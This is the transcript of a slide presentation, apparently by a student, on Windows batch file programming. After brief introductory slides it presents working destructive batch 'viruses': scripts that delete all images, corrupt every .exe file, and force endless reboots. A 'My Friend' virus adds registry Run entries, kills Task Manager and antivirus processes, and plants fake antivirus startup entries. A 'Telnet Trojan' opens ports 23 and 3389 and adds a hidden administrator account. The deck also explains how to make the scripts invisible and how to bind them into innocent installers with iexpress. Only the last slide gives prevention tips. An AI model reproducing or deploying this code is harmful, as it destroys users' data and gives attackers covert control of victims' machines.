batch file programming
DESCRIPTION
TRANSCRIPT
![Page 1: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/1.jpg)
Batch File Programming .(Virus Attacks)
Introduction.Structure.Operators.Syntax.Fun.Utilities.Virus Attacks.Preventions.
Presented by – Yogendra Kirar M.C.A Final year.
Dangerous.bat
![Page 2: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/2.jpg)
Introduction.Batch processing Explain.(In MS-Windows)
Batch processing means when there are some unique processes or tasks executes one after another in form of a group, bunch, or batch.
Here, in windows batch file means the bunch of DOS(Disk Operating System) Commands.
By effective batch file programming many utilities, funny items or viruses that harm the windows machines can prepared.
For good Batch file programmer deep knowledge of DOS commands is must.Commands in new
lines
![Page 3: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/3.jpg)
Introduction.For making any batch file steps
are.
Open Notepad. Type DOS commands separately in new
line. Saved it by .bat extension. To execute Double Click on that file which
looks like .
This is default icon of Batch files in Windows OS.
![Page 4: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/4.jpg)
StructureExample – running dos
command. Start-Run-cmd
Then cmd windows open looks like
Now type any ms dos commands. You can control entire Operation
System through DOS commands. For more commands type help and
press enter.
![Page 5: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/5.jpg)
StructureWorking of File
When we Click any batch file then-Firstly it opens the file read first line
command run in command prompt.-Then closes the file.-Again open the file and run second file
then close it.-Again open - run – close this process is
continue till the commands ends and exit.
Note: All commands must be in new Line.
![Page 6: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/6.jpg)
Operators. Operators – as Accelerators
With batch files, which are also called batch Programs or scripts, you can simplify routine or repetitive tasks
-Call -Setlocal -Echo -Endlocal -For -If -Rem -Goto -Shift -Endlocal
![Page 7: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/7.jpg)
Syntax
Syntax (mostly used)
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
echo [{on|off}] [message] for {%variable|%%variable} in (set) do command
[ CommandLineOptions] rem [comment] goto label
![Page 8: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/8.jpg)
FunUndeletable Folder with Your Name. This code will create a folder on desktop and in root of all
drives of your computer which is not simply deletable.--------------------------------------------------------------------------------------:ymd C:\"Documents and Settings"\"All Users"\Desktop\yogendramd c:\yogendramd d:\yogendramd e:\yogendramd f:\yogendramd g:\yogendramd h:\yogendragoto y---------------------------------------------------------------------------------------Copy this code in note pad and save it by anyname.bat
![Page 9: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/9.jpg)
Important:
Here, all of you a Question or doubt in mind.Is this true?You think that if the black window of command prompt will
continuously stays on desktop or on taskbar any on can suspect on it and if, somebody closes it then our batch file execution is stopped.
Solution of this is the Batch to Exe convertor software which converts batch file into exe . Then the file runs in background and uncatchable.
Bat2exe: you can download this from url: http://www.brothersoft.com/d.php?
soft_id=50301&url=http%3A%2F%2Fwww.f2ko.de%2Fdownloads%2FBat_To_Exe_Converter.zip
![Page 10: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/10.jpg)
Snapshot – Bat to Exe
Source path (.bat file)
Output path (.exe file)
Check invisible application
Finally compile the file
![Page 11: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/11.jpg)
Fun
Can’t do anything By this code we create a file that ends the explorer.exe and all
things are gone.
Code:----------------------------------------------------------------------------------------
Taskkill /im explorer.exe /f
----------------------------------------------------------------------------------------
![Page 12: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/12.jpg)
Fun
Many Folders this code creates 1000’s of folders with number naming.
Code:----------------------------------------------------------------------:eMd %random%Goto e----------------------------------------------------------------------
![Page 13: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/13.jpg)
FunRotating Clock hands this code rotates clocks hands continuously.Code:---------------------------------------------------------------------------------------------:ytime = 12:05:12time = 12:10:12time = 12:15:12time = 12:20:12time = 12:25:12time = 12:30:12time = 12:35:12time = 12:40:12time = 12:45:12time = 12:50:12time = 12:55:12goto y-----------------------------------------------------------------------------------------------------------------------------------
![Page 14: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/14.jpg)
Utilities
With funny things we can also make some utilities for windows machine.
Utilities which helps us to maintain our system like speed, performance, hardisk mantainence.
By batch file we can make schedule task.
![Page 15: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/15.jpg)
Utilities
Disk defragmenter file. This file is used to defragment your hard disk. Copy this file into
location. “C:\Documents and Settings\All Users\Start Menu\Programs\
Startup”code:------------------------------------------------------------------------------------------Defrag c: -fDefrag d: -fDefrag e: -fDefrag f: -fMsg * Defragment is completed---------------------------------------------------------------------------------------------
![Page 16: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/16.jpg)
UtilitiesSteganography code:Code:
-----------------------------------------------------------------------Copy /b %1 + /b %2 new.jpg exit-----------------------------------------------------------------------------------------Save this code by hide.batHiding process1. Copy this hide.bat in a folder.2. Now copy a jpge file and a text file which we wants to hide behind
jpeg in that folder.3. Now runs this hide .bat through dos prompt by providing names of
jpeg file and text file in order (.jpeg <space> .txt ) and runs it.A new.jpeg is created with text hidden in it.
4. To get your text open this jpeg in notepad and find your text in last of the notepad.
![Page 17: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/17.jpg)
UtilitiesRefresh. Code: Code:-----------------------------------------------------------------------taskkill /im explorer.exe /fstart explorer.exe----------------------------------------------------------------------------------------------
Scheduled Shutdown:Code:-----------------------------------------------------------------------At [time] shutdown –s –f –t 00 –c “Message”-----------------------------------------------------------------------
![Page 18: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/18.jpg)
Virus Attacks
System restart virus.This batch file code is restarts system when it startsCode:---------------------------------------------------------------------------------------------
echo shutdown –r –f –t 00 > shut.batmove shut.bat C:\"Documents and Settings"\"All Users"\"Start Menu"\Programs\
Startup----------------------------------------------------------------------------------------------
Copy the above code and paste in notepad by name anything.bat and runs on any Pc then after next restart the system will never starts and automatically restarts.
![Page 19: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/19.jpg)
Virus Attacks
For loop viruses 1
For loop is a looping operator which creates loop for any command
This code creates messages on desktop showing files are corrupted.
----------------------------------------------------------------------------------------------Code:For /r c:\ %%y in (*.*) do msg * %%y ------ is Corrupted. it not actually corrupts the file it shows only messages----------------------------------------------------------------------------------------------
Note: conversion into exe is required.
![Page 20: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/20.jpg)
Virus Attacks
For loop viruses 2 (Damage level :High)For loop is a looping operator which creates loop for any command1. This code will remove all images, wallpapers from your system Warning! -- Try it on your own risk.Code: for /r c:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q for /r d:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q for /r e:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q for /r f:\ %%y in (*.jpg,*.png,*.gif,*.ico) do del %%y /s/q
Note: conversion into exe is required.
![Page 21: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/21.jpg)
Virus AttacksFor loop viruses 3 (Damage level :High)For loop is a looping operator which creates loop for any command
1. This code will corrupt all exe files of your system.
Warning! -- Try it on your own risk.
Code:
echo 00967jyj875kkj6704ekfkf9iddkc224543453000 > c:\tempero.null
for /r c:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null %%y
for /r d:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null %%y
for /r e:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null %%y
for /r f:\ %%y in (*.exe) do copy /b %%y + c:\tempero.null %%y
del c:\tempero.null /s/q
Note: conversion into exe is required.
![Page 22: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/22.jpg)
Virus AttacksFor loop viruses 4 (Damage level :High)For loop is a looping operator which creates loop for any command1. This code will corrupt all exe files of your system. Warning! -- Try it on your own risk.
Code: echo you lost all !!!! >c:\tempero.null for /r c:\ %%y in (*.exe) do copy c:\temporal.null + %%y %%y for /r d:\ %%y in (*.exe) do copy c:\temporal.null + %%y %
%y for /r e:\ %%y in (*.exe) do copy c:\temporal.null + %%y %%y for /r f:\ %%y in (*.exe) do copy c:\temporal.null + %%y %%y del c:\tempero.null /s/q Note: conversion into exe is required.
![Page 23: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/23.jpg)
My Friend Virus (Dangerous level : High) @echo off rename mypic.exe igfx.exe if exist c:\windows\system32\igfx.exe goto code if exist d:\windows\system32\igfx.exe goto code if exist e:\windows\system32\igfx.exe goto code if exist f:\windows\system32\igfx.exe goto code if exist g:\windows\system32\igfx.exe goto code echo Windows Registry Editor Version 5.00>yog.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>yog.reg if exist c:\windows\nul echo "yhlsagent"="c:\\windows\\system32\\igfx.exe">>yog.reg if exist d:\windows\nul echo "yhlsagent"="d:\\windows\\system32\\igfx.exe">>yog.reg if exist e:\windows\nul echo "yhlsagent"="e:\\windows\\system32\\igfx.exe">>yog.reg if exist f:\windows\nul echo "yhlsagent"="f:\\windows\\system32\\igfx.exe">>yog.reg if exist g:\windows\nul echo "yhlsagent"="g:\\windows\\system32\\igfx.exe">>yog.reg echo "avast!"="C:\\PROGRA~1\\Disp.exe">>yog.reg echo "avgnt"="C:\\PROGRA~1\\avg.exe">>yog.reg echo "USB Antivirus"="C:\\Program Files\\Guard.exe">>yog.reg regedit /s yog.reg del yog.reg /s/q echo Windows Registry Editor Version 5.00>yog.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>yog.reg echo "LegalNoticeCaption"="Say Happy Birthday to me">>yog.reg echo "LegalNoticeText"="I want that you wish to me on my birthday. I am very alone person, I have no any friend, do u want to become my friend, please accept me as
ur friend, all the best my friend for ur all works in future, I want to ask u a question would u be alone as me, so plz develop ur interest in making friends like me. !!!!!!!!!!!">>yog.reg
regedit /s yog.reg del yog.reg /s/q if exist c:\windows\nul copy igfx.exe c:\windows\system32 if exist d:\windows\nul copy igfx.exe d:\windows\system32 if exist e:\windows\nul copy igfx.exe e:\windows\system32 if exist f:\windows\nul copy igfx.exe f:\windows\system32 if exist g:\windows\nul copy igfx.exe g:\windows\system32 :code shutdown -r -f -t 600 :e if exist c:\windows\nul md C:\Docume~1\Admini~1\Desktop\"I always with u my friend" if exist d:\windows\nul md d:\Docume~1\Admini~1\Desktop\"I always with u my friend" if exist e:\windows\nul md e:\Docume~1\Admini~1\Desktop\"I always with u my friend" if exist f:\windows\nul md f:\Docume~1\Admini~1\Desktop\"I always with u my friend" if exist g:\windows\nul md g:\Docume~1\Admini~1\Desktop\"I always with u my friend" taskkill /im USBGuard.exe /f taskkill /im notepad.exe /f taskkill /im SOUNDMAN.exe /f taskkill /im taskmgr.exe /f date 02-12-3060
goto e conversion into exe is required
![Page 24: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/24.jpg)
Telnet Trojen.
Work as Remote Administrator tool with the use of telenet.
@echo offsc config tlntsvr start= autonet start tlntsvrnetsh firewall add portopening TCP 23 "Telnet"sc config termservice start= autonet start termservicenetsh firewall add portopening TCP 3389 "Remote Desktop" net user Default 12345 /addnet localgroup administrators Default /add
By Sourabh Mishra.
![Page 25: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/25.jpg)
Finishing Virus Coding
Firstly copy all these coding into the notepad and name them anything with .bat extention.
Now converts this .bat file into .exe file with the help of Bat to Exe converter.
This is the software which Helps us to hide the cmd coding and runs the process in background.
File.bat File.exe
![Page 26: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/26.jpg)
Finishing Virus Coding
After converting .bat file into .exe file What to do Next? All of u thinking that these are the .exe files how these are
spreads. Your answer is the software which reside in directory c:\windows\system32\
with name iexpress to start iexpress Start > Run > iexpress You will see this windows this is your mixing software.
![Page 27: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/27.jpg)
Finishing Virus Coding
Follows the instruction of software then after pressing some next you will find this window.
Here, add your viral code and the innocent software(exe) in which u want to bind this.
![Page 28: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/28.jpg)
Finishing Virus Coding
After that in two selection windows firstly select the innocent software(exe) location then in second
Window select your viral code(exe).
Follows the instruction and yourNew software setup is createdWhich is innocent but containsHarmful virus.
When we install this software , then After installation of software the Added virus code is runs.
![Page 29: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/29.jpg)
Finishing Virus Coding
Mixing process.
.bat
.exesetup.exe
![Page 30: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/30.jpg)
Prevention (Conclusion)Some possible prevention or conclusions are
1.Do not accept any file with .bat or .exe extension on the internet while chatting or from your mailbox.
2.Do not take softwares from untrusted vendors.3.Always check your autoruns by— start>run>msconfig>startup if u find something suspected target its path and remove it
after checking it.4.These are the batch viruses which are not so advanced viruses
but having very dangerous capabilities, and only strong updated antivirus can catch them so always kept updated antivirus.
![Page 31: Batch file programming](https://reader036.vdocuments.site/reader036/viewer/2022081518/5480b2d8b4af9f98028b4767/html5/thumbnails/31.jpg)
Have any questions?
Yogendra Kirar.